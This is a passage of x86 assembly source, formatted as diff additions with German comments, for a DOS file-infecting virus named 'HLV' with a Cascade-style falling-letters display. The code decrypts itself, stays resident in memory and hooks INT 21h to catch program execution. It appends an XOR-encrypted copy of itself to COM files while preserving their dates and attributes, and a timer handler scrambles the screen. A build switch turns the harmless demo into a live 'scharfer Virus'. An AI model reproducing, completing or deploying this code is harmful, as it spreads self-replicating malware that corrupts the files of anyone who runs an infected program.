+Crypt3 EQU Crypt1 + PSPsize ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einsprungstelle, entschl乻seln des Virus falls notwendig. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_000: CLI ; + MOV BP,SP ; + CALL XI_001 ; +XI_001: POP BX ; + SUB BX,FIRSTCONST ; + TEST BYTE PTR CS:[BX+Crypt2],EnCrptd ; + JZ XI_003 ; + LEA SI,[BX + XR_000] ; + MOV SP,OFFSET EOFC-OFFSET XI_003 ; +XI_002: XOR [SI],SI ; + XOR [SI],SP ; + INC SI ; + DEC SP ; + JNZ XI_002 ; +XI_003 LABEL NEAR ; + XR_000 EQU OFFSET XI_003 + FIRSTBASE ; + XR_001 EQU XI_003 + PSPsize ; + MOV SP,BP ; + JMP SHORT XI_004 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Datenbereich 2. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; + XD_000 DW PSPsize ; +Disp_to_com_1 EQU OFFSET XD_000 + FIRSTBASE ; + XD_001 DW 9090 ; +Disp_to_com_2 EQU OFFSET XD_001 + FIRSTBASE ; + XD_002 DW 9090 ; +Initial_AX EQU OFFSET XD_002 + FIRSTBASE ; + XD_003 EQU THIS WORD ; + XD_004 EQU THIS BYTE + 2 ; + NOP ; + NOP ; + NOP ; +Org1stInstr_s1 EQU OFFSET XD_003 + FIRSTBASE ; +Org1stInstr_t1 EQU XD_003 + PSPsize ; +Org1stInstr_t2 EQU XD_003 + PSPsize + 1 ; +Org1stInstr_s2 EQU OFFSET XD_004 + FIRSTBASE ; + XD_005 DW 2 dup ( 9090 ) ; +Org_Int_1C EQU XD_005 + PSPsize ; + XD_006 DW 2 dup ( 9090 ) ; +Org_int_21s EQU OFFSET XD_006 + FIRSTBASE ; +Org_Int_21t EQU XD_006 + PSPsize ; + ; +IF SWITCHABLE ; + ; + XD_007 DW 2 dup ( 9090 ) ; +Org_Int_2F EQU XD_007 + PSPsize ; + XD_008 DB 5, "_HLV_ " ; +Cmd_2F EQU XD_008 + PSPsize ; + XD_009 DB 'HLV is on',0Dh,0Ah,'$' ; +Msg_On EQU XD_009 + PSPsize ; + XD_010 DB 'HLV is off',0Dh,0Ah,'$' ; +Msg_Off EQU XD_010 + PSPsize ; + ; +ENDIF ; + ; + XD_011 DW 9090 ; +File_Attributes EQU XD_011 + PSPsize ; + XD_012 DW 9090 ; +File_Date EQU XD_012 + PSPsize ; + XD_013 DW 9090 ; +File_Time EQU XD_013 + PSPsize ; + XD_014 DW 2 dup ( 9090 ) ; +Pathname EQU XD_014 + PSPsize ; + XD_015 DW 2 dup ( 9090 ) ; +File_Size_lsb EQU XD_015 + PSPsize ; +File_Size_msb EQU XD_015 + PSPsize + 2 ; + XD_016 DB NearJmp ; +FirstOpCode_1 EQU XD_016 + PSPsize ; + XD_017 DW 9090 ; +FirstOpCode_2 EQU XD_017 + PSPsize ; + XD_018 DB 90 ; +Num_of_Col EQU XD_018 + PSPsize ; + XD_019 DB 90 ; +Last_Line EQU XD_019 + PSPsize ; + XD_020 DB 90 ; +Prevent_Snow? EQU XD_020 + PSPsize ; +Last_Pair EQU THIS WORD + PSPsize ; + XD_021 DB 90 ; + XD_022 DB 90 ; +Last_Char EQU XD_021 + PSPsize ; +Last_Attr EQU XD_022 + PSPsize ; +RecTyp1 RECORD ExtCom:1, Recf_1:1, R_in_1c:1 ; + XD_023 RecTyp1 <0,0,0> ; +ISR_Flags EQU XD_023 + PSPsize ; + XD_024 DW 9090 ; +Seg_of_VRAM EQU XD_024 + PSPsize ; + XD_025 DW 9090 ; +Page_offset EQU XD_025 + PSPsize ; + XD_026 DW 9090 ; +Speed EQU XD_026 + PSPsize ; + XD_027 DW 9090 ; +XR_002 EQU XD_027 + PSPsize ; + XD_028 DW 9090 ; +XR_003 EQU XD_028 + PSPsize ; + XD_029 DW 9090 ; +Num_of_char EQU XD_029 + PSPsize ; + XD_030 DW 9090 ; +XR_004 EQU XD_030 + PSPsize ; + XD_031 DW 7 dup ( 9090 ) ; +FirstRandom EQU XD_031 + PSPsize ; +LastRandom EQU This Word + PSPsize ; + DW 9090 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Installieren u. relozieren falls notwendig. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_004: CALL XI_005 ; +XI_005 LABEL NEAR ; +XR_005 EQU XI_005 + PSPsize ; + POP BX ; + SUB BX,FIRSTBASE2 ; + MOV CS:[BX+Disp_to_com_2],CS ; + MOV CS:[BX+Initial_AX],AX ; + MOV AX,CS:[BX+Org1stInstr_s1] ; + MOV [PSP_100],AX ; + MOV AL,CS:[BX+Org1stInstr_s2] ; + MOV [PSP_102],AL ; + PUSH BX ; + MOV AH,MS_GetVer ; + MSDOS ; + POP BX ; + CMP AL,DOS_v_02 ; + JB XI_006 ; + MOV AX,MS_Exec * 100 + Virus_fun ; + XOR DI,DI ; + XOR SI,SI ; + MSDOS ; + CMP DI,Virus_sig ; + JNZ XI_007 ; +XI_006: STI ; + MOV_S ES,DS ; + MOV AX,CS:[BX+Initial_AX] ; + JMP DWORD PTR CS:[BX+Disp_to_com_1] ; +XI_007: PUSH BX ; + MOV AX,MS_GetInt * 100 + DOS ; + MSDOS ; + MOV AX,BX ; + POP BX ; + MOV CS:[BX+Org_int_21s],AX ; + MOV CS:[BX+Org_int_21s + 2],ES ;------------; + MOV AX, (OFFSET EOFC - OFFSET Crypt1) SHR 4 + 11 ; + MOV BP,CS ;------------; + DEC BP ; + MOV ES,BP ; + MOV SI,CS:[PSPCurCom] ; + MOV ES:[MemCBowned],SI ; + MOV DX,ES:[MemCBsize] ; + MOV ES:[MemCBsize],AX ; + MOV ES:[MemCBsig],'M' ; + SUB DX,AX ; + DEC DX ; + INC BP ; + ADD BP,AX ; + INC BP ; + MOV ES,BP ; + PUSH BX ; + MOV AH,MS_SetPSP ; + MOV BX,BP ; + MSDOS ; + POP BX ; + XOR DI,DI ; + MOV_S SS,ES ; + PUSH DI ; + LEA DI,[BX+XR_010] ; + MOV SI,DI ; + MOV CX,OFFSET EOFC ; + STD ; + REPZ MOVSB ; + PUSH ES ; + LEA CX,[BX+XR_006] ; + PUSH CX ; + RETF ; +XI_008 LABEL NEAR ; +XR_006 EQU OFFSET XI_008 + FIRSTBASE ; + MOV CS:[BX+Disp_to_com_2],CS ; + LEA CX,[BX+Crypt2] ; + REPZ MOVSB ; + MOV CS:[PSP_SegJFB],CS ; + DEC BP ; + MOV ES,BP ; + MOV ES:[MemCBsize],DX ; + MOV ES:[MemCBsig],'Z' ; + MOV ES:[MemCBowned],CS ; + INC BP ; + MOV ES,BP ; + MOV_S ES,DS ; + MOV_S DS,CS ; + LEA SI,[BX+Crypt2] ; + MOV DI,PSPsize ; + MOV CX,OFFSET EOFC ; + CLD ; + REPZ MOVSB ; + PUSH ES ; + LEA AX,[XR_007] ; + PUSH AX ; + RETF ; +XI_009 LABEL NEAR ; +XR_007 EQU XI_009 + PSPsize ; + MOV CS:[PSPEnv],NoEnv ; + MOV CS:[PSPCurCom],CS ; + PUSH DS ; + LEA DX,[XR_008] ; + MOV_S DS,CS ; + MOV AX,MS_SetInt * 100 + DOS ; + MSDOS ; + POP DS ; + MOV AH,MS_SetDTA ; + MOV DX,DTA_in_PSP ; + MSDOS ; + SAVE DS,ES,SI,DI,CX ; + MOV_S ES,CS ; + MOV CX,BIOSDATASEG ; + MOV DS,CX ; + MOV DI,OFFSET FirstRandom ; + MOV SI,OFFSET B_TIMERVAR ; + MOV CL,8 ; + CLD ; + REPZ MOVSW ; + REST CX,DI,SI,ES,DS ; + ; +IF SWITCHABLE ; + ; + PUSH DS ; + MOV AX,MS_GetInt * 100 + DOS_multi ; + MSDOS ; + MOV CS:[Org_Int_2F],BX ; + MOV CS:[Org_Int_2F + 2],ES ; + MOV AX,MS_SetInt * 100 + DOS_multi ; + MOV DX,offset Int_2F_ISR ; + MOV_S DS,CS ; + MSDOS ; + POP DS ; + ; +ENDIF ; + ; + OR CS:[ISR_Flags],MASK ExtCom ; + MOV AH,MS_GetDateTime ; + MSDOS ; + CMP CX,YEAR ; + JZ XI_010 ; + JMP SHORT XI_011 ; +XI_010: CMP DH,MONTH ; + JB XI_011 ; + AND CS:[ISR_Flags],NOT MASK ExtCom ; +XI_011: MOV AX,1518 ; + CALL Random ; + INC AX ; + MOV CS:[XR_002],AX ; + MOV CS:[XR_003],AX ; + MOV CS:[XR_004],1 ; + MOV AX,MS_GetInt * 100 + TimerInt ; + MSDOS ; + MOV CS:[Org_Int_1C],BX ; + MOV CS:[Org_Int_1C + 2],ES ; + PUSH DS ; + MOV AX,MS_SetInt * 100 + TimerInt ; + MOV DX,OFFSET XR_009 ; + MOV_S DS,CS ; + MSDOS ; + POP DS ; +XI_012: MOV BX,OFFSET XR_005 - (FIRSTBASE2) ; + JMP XI_006 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Neue Interrupt 21(h) Behandlungsroutine ( ver刵dert Exec - Funktion ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_013 LABEL NEAR ; +XR_008 EQU XI_013 + PSPsize ; + CMP AH,MS_Exec ; + JZ XI_016 ; +XI_014: JMP DWORD PTR CS:[Org_Int_21t] ; +XI_015: MOV DI,Virus_Sig ; + LES AX,CS:DWORD PTR [Org_Int_21t] ; + MOV DX,CS ; + IRET ; +XI_016: CMP AL,Virus_fun ; + JZ XI_015 ; + CMP AL,MS_Exec_SF0 ; + JNZ XI_014 ; + SAVE F,AX,BX,CX,DX,SI,DI,BP,ES,DS ; + MOV CS:[Pathname],DX ; + MOV CS:[Pathname + 2],DS ; + MOV_S ES,CS ; + MOV AX,MS_Open * 100 + Read_Only ; + MSDOS ; + JB XI_018 ; + MOV BX,AX ; + MOV AX,MS_GetFileDate ; + MSDOS ; + MOV CS:[File_Date],DX ; + MOV CS:[File_Time],CX ; + MOV AH,MS_Read ; + MOV_S DS,CS ; + MOV DX,OFFSET Org1stInstr_t1 ; + MOV CX,3 ; + MSDOS ; + JB XI_018 ; + CMP AX,CX ; + JNZ XI_018 ; + MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + MOV CS:[File_Size_lsb],AX ; + MOV CS:[File_Size_msb],DX ; + MOV AH,MS_Close ; + MSDOS ;---------------; + CMP CS:[Org1stInstr_t1], 'Z' * 100 + 'M' ; + JNZ XI_017 ; + JMP XI_025 ; +XI_017: CMP CS:[File_Size_msb],+0 ; + JA XI_018 ; + CMP CS:[File_Size_lsb],offset Crypt1-offset EOFC-20 ; + JBE XI_019 ; +XI_018: JMP XI_025 ; +XI_019: CMP BYTE PTR CS:[Org1stInstr_t1],NearJmp ; + JNZ XI_020 ; + MOV AX,CS:[File_Size_lsb] ; + ADD AX,OFFSET Crypt1 - offset EOFC - 2 ; + CMP AX,CS:[Org1stInstr_t2] ;---------------; + JZ XI_018 ; + ; +IF DEMO ; +XI_020: CALL DEMO_Infect ; + JMP XI_025 ; + ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍吧屯屯屯屯屯屯屯屯突鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 Demo - Version, 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 k e i n Virus. 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +ENDIF ;----------------; +ELSE ; +IFDEF _DANGER ; +XI_020 MOV AX,MS_GetFileAttr ; + LDS DX,CS:DWORD PTR [Pathname] ; + MSDOS ; + JB XI_018 ; + MOV CS:[File_Attributes],CX ; + XOR CL,Attr_A ; + TEST CL,Attr_ASHR ; + JZ XI_021 ; + MOV AX,MS_SetFileAttr ; + XOR CX,CX ; + MSDOS ; + JB XI_018 ; +XI_021: MOV AX,MS_Open * 100 + Read_Write ; + MSDOS ; + JB XI_018 ; + MOV BX,AX ; + MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + CALL Append_Virus ; + JNB XI_022 ; + MOV AX,MS_MoveFP * 100 + OfsFrmTop ; + MOV CX,CS:[File_Size_msb] ; + MOV DX,CS:[File_Size_lsb] ; + MSDOS ; + MOV AH,MS_Write ; + XOR CX,CX ; + MSDOS ; + JMP SHORT XI_023 ; +XI_022: MOV AX,MS_MoveFP * 100 + OfsFrmTop ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + JB XI_023 ; + MOV AX,CS:[File_Size_lsb] ; + ADD AX,-2 ; + MOV CS:[FirstOpCode_2],AX ; + MOV AH,MS_Write ; + MOV DX,OFFSET FirstOpCode_1 ; + MOV CX,3 ; + MSDOS ; +XI_023: MOV AX,MS_SetFileDate ; + MOV DX,CS:[File_Date] ; + MOV CX,CS:[File_Time] ; + MSDOS ; + MOV AH,MS_Close ; + MSDOS ; + MOV CX,CS:[File_Attributes] ; + TEST CL,Attr_SHR ; + JNZ XI_024 ; + TEST CL,Attr_A ; + JNZ XI_025 ; +XI_024: MOV AX,MS_SetFileAttr ; + LDS DX,CS:DWORD PTR [Pathname] ; + MSDOS ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍吧屯屯屯屯屯屯屯屯突鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 KEIN DEMO, 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 scharfer Virus. 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +ENDIF ; +ELSE ; + .ERR ; +ENDIF ; +ENDIF ; +IF SWITCHABLE ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍赏屯屯屯屯褪屯屯屯屯屯屯屯屯褪屯屯屯屯屯话鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍 Neuer interner MSDOS Befehl '_HLV_' ! 喊鞍鞍鞍鞍鞍昂 +ENDIF ; +ELSE ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍赏屯屯屯屯褪屯屯屯屯屯屯屯屯褪屯屯屯屯屯话鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍 Kommando '_HLV_' nicht implementiert. 喊鞍鞍鞍鞍鞍昂 +ENDIF ; +ENDIF ; +DISPNUM MACRO nu,nuxx ; +%Out 喊鞍鞍鞍鞍鞍 (Monat - Jahr) nu - nuxx 喊鞍鞍鞍鞍鞍昂 +ENDM ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍 Bis zum Jahresende aktiv ab: 喊鞍鞍鞍鞍鞍昂 +.radix 10 ; +DISPNUM %MONTH,%YEAR ; +.radix 16 ; +%Out 喊鞍鞍鞍鞍鞍韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯及鞍鞍鞍鞍鞍昂 +endif ; +XI_025: REST DS,ES,BP,DI,SI,DX,CX,BX,AX,F ;----------------; + JMP XI_014 ; +IF DEMO ; + ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Statt APPEND in der DEMO - Version aufgerufene Prozedur. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +DEMO_INFECT PROC NEAR ; + push ax ; + push cx ; + in al,61 ; + or al,3 ; + out 61,al ; + mov al,0b6 ; + out 43,al ; + mov cx,0a ; +XI_026: dec cx ; + jz XI_030 ; +XI_027: mov ax,200d ; +XI_028: dec ax ; + cmp ax,100d ; + jz XI_031 ; + push ax ; + out 42,al ; + push cx ; + mov cx,150d ; +XI_029: nop ; + loop XI_029 ; + pop cx ; + mov al,ah ; + out 42,al ; + pop ax ; + jmp XI_028 ; +XI_030: in al,61 ; + and al,0fc ; + out 61,al ; + pop cx ; + pop ax ; + ret ; +XI_031: inc ax ; + cmp ax,600d ; + jz XI_026 ; + push ax ; + out 42,al ; + push cx ; + mov cx,150d ; +XI_032: nop ; + loop XI_032 ; + pop cx ; + mov al,ah ; + out 42,al ; + pop ax ; + jmp XI_031 ; +DEMO_INFECT ENDP ; + ; +ELSE ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Append Virus - von der Int21ISR aufgerufene Infektions-Prozdur +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Append_Virus PROC NEAR ; + SAVE ES,BX ; + MOV AH,MS_AllocMem ;----------; + MOV BX,(OFFSET EOFC - OFFSET Crypt1) SHR 4 + 1 ; + MSDOS ;----------; + POP BX ; + JNB XI_034 ; +XI_033: STC ; + POP ES ; + RET ; +XI_034: MOV CS:[Crypt3],EnCrptd ; + MOV ES,AX ; + MOV_S DS,CS ; + XOR DI,DI ; + MOV SI,PSPsize ; + MOV CX,OFFSET EOFC ; + CLD ; + REPZ MOVSB ; + MOV DI,OFFSET XI_003 ; + MOV SI,OFFSET XR_001 ; + ADD SI,[File_Size_lsb] ; + MOV CX,OFFSET EOFC - OFFSET XI_003 ; +XI_035: XOR ES:[DI],SI ; + XOR ES:[DI],CX ; + INC DI ; + INC SI ; + LOOP XI_035 ; + MOV DS,AX ; + MOV AH,MS_Write ; + XOR DX,DX ; + MOV CX,OFFSET EOFC ; + MSDOS ; + SAVE F,AX ; + MOV AH,MS_ReleaseMem ; + MSDOS ; + REST AX,F ; + MOV_S DS,CS ; + JB XI_033 ; + CMP AX,CX ; + JNZ XI_033 ; + POP ES ; + CLC ; + RET ; +Append_Virus ENDP ; + ; +ENDIF ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + 'Zufallszahlen' - Generator. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Random PROC NEAR ; + SAVE DS ; + MOV_S DS,CS ; + SAVE BX,CX,DX,AX ; + MOV CX,7 ; + MOV BX,offset LastRandom ; + PUSH [BX] ; +XI_036: MOV AX,[BX-02] ; + ADC [BX],AX ; + DEC BX ; + DEC BX ; + LOOP XI_036 ; + POP AX ; + ADC [BX],AX ; + MOV DX,[BX] ; + POP AX ; + OR AX,AX ; + JZ XI_037 ; + MUL DX ; +XI_037: MOV AX,DX ; + REST DX,CX,BX,DS ; + RET ; +Random ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Zeichen und Attribut aus Videospeicher auslesen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Load_from_VRAM PROC NEAR ; + SAVE SI,DS,DX ; + MOV AL,DH ; + MUL [Num_of_Col] ; + MOV DH,0 ; + ADD AX,DX ; + SHL AX,1 ; + ADD AX,[Page_offset] ; + MOV SI,AX ; + TEST [Prevent_Snow?],-1 ; + MOV DS,[Seg_of_VRAM] ; + JZ XI_038 ; + Wait_HRI_or_VRI ; +XI_038: LODSW ; + STI ; + REST DX,DS,SI ; + RET ; +Load_from_VRAM ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Zeichen und Attribut (AX) in den Videospeicher schreiben. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Write_to_VRAM PROC NEAR ; + SAVE DI,ES,DX,BX ; + MOV BX,AX ; + MOV AL,DH ; + MUL [Num_of_Col] ; + MOV DH,0 ; + ADD AX,DX ; + SHL AX,1 ; + ADD AX,[Page_offset] ; + MOV DI,AX ; + TEST [Prevent_Snow?],-1 ; + MOV ES,[Seg_of_VRAM] ; + JZ XI_039 ; + Wait_HRI_or_VRI ; +XI_039: MOV AX,BX ; + STOSB ; + STI ; + REST BX,DX,ES,DI ; + RET ; +Write_to_VRAM ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Bit 0 von Port B des 8255 Chips zur乧ksetzen (IO-Adresse : &H61 ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Toggle_Speaker PROC NEAR ; + PUSH AX ; + IN AL,PORT_B_8255 ; + XOR AL,02 ; + AND AL,0FE ; + OUT PORT_B_8255,AL ; + POP AX ; + RET ; +Toggle_Speaker ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + CF gesetzt, wenn AL ein nicht darstellbares Zeichen enth刲t. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Is_it_blank_? PROC NEAR ; + CMP AL,0 ; + JZ XI_040 ; + CMP AL,20 ; + JZ XI_040 ; + CMP AL,-1 ; + JZ XI_040 ; + CLC ; + RET ; +XI_040: STC ; + RET ; +Is_it_blank_? ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + CF gesetzt, wenn AL ein Zeichen aus dem Linienzeichensatz enth刲t. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Spec_Graphik? PROC NEAR ; + CMP AL,0B0 ; + JB XI_041 ; + CMP AL,0DF ; + JA XI_041 ; + STC ; + RET ; +XI_041: CLC ; + RET ; +Spec_Graphik? ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Geschwindigkeit der Maschine ( zur Verwendung in DELAY ) ermitteln. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +GetSysSpeed PROC NEAR ; + PUSH DS ; + MOV AX,BIOSDATASEG ; + MOV DS,AX ; + STI ; + MOV AX,[B_TIMERVAR] ; +XI_042: CMP AX,[B_TIMERVAR] ; + JZ XI_042 ; + XOR CX,CX ; + MOV AX,[B_TIMERVAR] ; +XI_043: INC CX ; + JZ XI_045 ; + CMP AX,[B_TIMERVAR] ; + JZ XI_043 ; +XI_044: POP DS ; + MOV AX,CX ; + XOR DX,DX ; + MOV CX,0F ; + DIV CX ; + MOV CS:[Speed],AX ; + RET ; +XI_045: DEC CX ; + JMP XI_044 ; +GetSysSpeed ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Verz攇ern ( Verz攇erungszeit ist kaum maschinenabh刵gig ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Delay PROC NEAR ; + PUSH CX ; +XI_046: PUSH CX ; + MOV CX,[Speed] ; +XI_047: LOOP XI_047 ; + POP CX ; + LOOP XI_046 ; + POP CX ; + RET ; +Delay ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Eine neue Interrupt 1C(h) Behandlungsroutine. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_048 LABEL NEAR ; +XR_009 EQU XI_048 + PSPsize ;----------; + TEST CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom ; + JZ XI_049 ;----------; + JMP XI_067 ; +XI_049: OR CS:[ISR_Flags],MASK R_in_1c ; + DEC CS:[XR_002] ; + JZ XI_050 ; + JMP XI_066 ; +XI_050: SAVE DS,ES ; + MOV_S DS,CS ; + MOV_S ES,CS ; + SAVE AX,BX,CX,DX,SI,DI,BP ; + MOV AL,EOI_8259A ; + OUT PORT_B_8259A,AL ; + MOV AX,[XR_003] ; + CMP AX,0438 ; + JNB XI_051 ; + MOV AX,0438 ; +XI_051: CALL Random ; + INC AX ; + MOV [XR_002],AX ; + MOV [XR_003],AX ; + PUSH DS ; + MOV AX,BIOSDATASEG ; + MOV DS,AX ; + MOV AX,[B_VidPage] ; + POP DS ; + MOV [Page_offset],AX ; + MOV [Last_Line],18 ; + MOV DL,-1 ; + MOV AX,1130 ; + MOV BH,0 ; + SAVE ES,BP ; + INT 10 ; + REST BP,ES ; + CMP DL,-1 ; + JZ XI_052 ; + MOV [Last_Line],DL ; +XI_052: CALL GetSysSpeed ; + MOV AH,0F ; + INT 10 ; + MOV [Num_of_Col],AH ; + MOV [Prevent_Snow?],0 ; + MOV [Seg_of_VRAM],MonoBase ; + CMP AL,07 ; + JZ XI_054 ; + JB XI_053 ; + JMP XI_064 ; +XI_053: MOV [Seg_of_VRAM],ColorBase ; + CMP AL,03 ; + JA XI_054 ; + CMP AL,02 ; + JB XI_054 ; + MOV [Prevent_Snow?],01 ; + MOV AL,[Last_Line] ; + INC AL ; + MUL [Num_of_Col] ; + MOV [Num_of_char],AX ; + MOV AX,[XR_004] ; + CMP AX,[Num_of_char] ; + JBE XI_054 ; + MOV AX,[Num_of_char] ; +XI_054: CALL Random ; + INC AX ; + MOV SI,AX ; +XI_055: XOR DI,DI ; +XI_056: INC DI ; + MOV AX,[Num_of_char] ; + SHL AX,1 ; + CMP DI,AX ; + JBE XI_057 ; + JMP XI_064 ; +XI_057: OR [ISR_Flags],MASK Recf_1 ; + MOV AL,[Num_of_Col] ; + MOV AH,0 ; + CALL Random ; + MOV DL,AL ; + MOV AL,[Last_Line] ; + MOV AH,0 ; + CALL Random ; + MOV DH,AL ; + CALL Load_from_VRAM ; + CALL Is_it_blank_? ; + JB XI_056 ; + CALL Spec_Graphik? ; + JB XI_056 ; + MOV [Last_Pair],AX ; + MOV CL,[Last_Line] ; + MOV CH,0 ; +XI_058: INC DH ; + CMP DH,[Last_Line] ; + JA XI_062 ; + CALL Load_from_VRAM ; + CMP AH,[Last_Attr] ; + JNZ XI_062 ; + CALL Is_it_blank_? ; + JB XI_060 ; +XI_059: CALL Spec_Graphik? ; + JB XI_062 ; + INC DH ; + CMP DH,[Last_Line] ; + JA XI_062 ; + CALL Load_from_VRAM ; + CMP AH,[Last_Attr] ; + JNZ XI_062 ; + CALL Is_it_blank_? ; + JNB XI_059 ; + CALL Toggle_Speaker ; + DEC DH ; + CALL Load_from_VRAM ; + MOV [Last_Char],AL ; + INC DH ; +XI_060: AND [ISR_Flags],NOT MASK Recf_1 ; + DEC DH ; + MOV AL,' ' ; + CALL Write_to_VRAM ; + INC DH ; + MOV AL,[Last_Char] ; + CALL Write_to_VRAM ; + JCXZ XI_061 ; + CALL Delay ; + DEC CX ; +XI_061: JMP XI_058 ; +XI_062: TEST [ISR_Flags],MASK Recf_1 ; + JZ XI_063 ; + JMP XI_056 ; +XI_063: CALL Toggle_Speaker ; + DEC SI ; + JZ XI_064 ; + JMP XI_055 ; +XI_064: IN AL,PORT_B_8255 ; + AND AL,0FC ; + OUT PORT_B_8255,AL ; + MOV AX,3 ; + CALL Random ; + INC AX ; + MUL [XR_004] ; + JNB XI_065 ; + MOV AX,-1 ; +XI_065: MOV [XR_004],AX ; + REST BP,DI,SI,DX,CX,BX,AX,ES,DS ; 